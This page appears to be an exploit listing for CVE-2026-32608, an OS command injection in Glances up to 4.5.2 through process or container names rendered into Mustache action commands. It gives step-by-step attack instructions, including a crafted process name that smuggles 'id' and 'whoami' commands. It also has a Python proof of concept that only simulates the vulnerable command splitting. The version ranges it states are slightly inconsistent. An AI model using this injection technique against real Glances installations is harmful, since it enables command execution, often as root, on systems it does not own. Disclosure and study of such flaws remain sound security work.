Glances <= 4.5.2 OS Command Injection via Mustache Template Fields

2026.03.18

Credit: Mohammed Idrees Banyamer

Risk: High

Local: No

Remote: Yes

CVE: CVE-2026-32608

CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))

#!/usr/bin/env python3
# Exploit Title:        Glances <= 4.5.2  OS Command Injection via Mustache Template Fields
# CVE:                  CVE-2026-32608
# Date:                 2026-03-18
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Vendor Homepage:      https://github.com/nicolargo/glances
# Software Link:        https://pypi.org/project/glances/
# Affected:             Glances <= 4.5.2-dev01 (pip / source installs)
# Tested on:            Glances 4.5.1
# Category:             Remote
# Platform:             Linux / macOS / Windows (where Glances runs)
# Exploit Type:         Command Injection
# CVSS:                 7.0 (High)
# Description:          Glances insecurely processes user-controlled values (process names, container names, mount points) in Mustache templates used in action commands. Malicious entity names can inject arbitrary OS commands via | && > separators before secure_popen splitting logic.
# Fixed in:             Glances 4.5.2 (commit 6f4ec53d967478e69917078e6f73f448001bf107)
# Usage:
#   python3 exploit.py
#
# Examples:
#   python3 exploit.py
#
# Options:
#   -- (no command-line options implemented in this minimal PoC)
#
# Notes:
#   • Requires Glances to be running with a config containing action commands using {{name}}, {{container_name}} etc.
#   • Attacker must be able to create/rename processes or Docker containers on the target system.
#   • Executes commands as the user running Glances (often root when run as service)
#
# How to Use
#
# Step 1:
#   Install vulnerable version: pip install "glances<4.5.2"
#
# Step 2:
#   Create glances.conf with e.g.:
#     [processlist]
#     critical_action=echo "ALERT: {{name}}" >> /tmp/alert.log
#
# Step 3:
#   Run Glances: glances --config glances.conf
#
# Step 4:
#   Create malicious process:
#     cp /bin/sleep "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||"
#     "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||" 999 &
#
# Step 5:
#   Wait for Glances to evaluate process list and trigger action

import subprocess
import shlex

def vulnerable_secure_popen(cmd: str):
    for sep in ("&&", "|", ">"):
        cmd = cmd.replace(sep, f" {sep} ")
    parts = [p.strip() for p in cmd.split() if p.strip()]
    for part in parts:
        print(f"[EXEC] {part}")

malicious_name = 'innocent|id>/tmp/pwned;whoami>>/tmp/pwned||'
template = 'echo "ALERT: {{name}} used 99% CPU" >> /tmp/alerts.log'
rendered = template.replace('{{name}}', malicious_name)

print("Rendered command:", rendered)
vulnerable_secure_popen(rendered)

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Glances <= 4.5.2 OS Command Injection via Mustache Template Fields

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.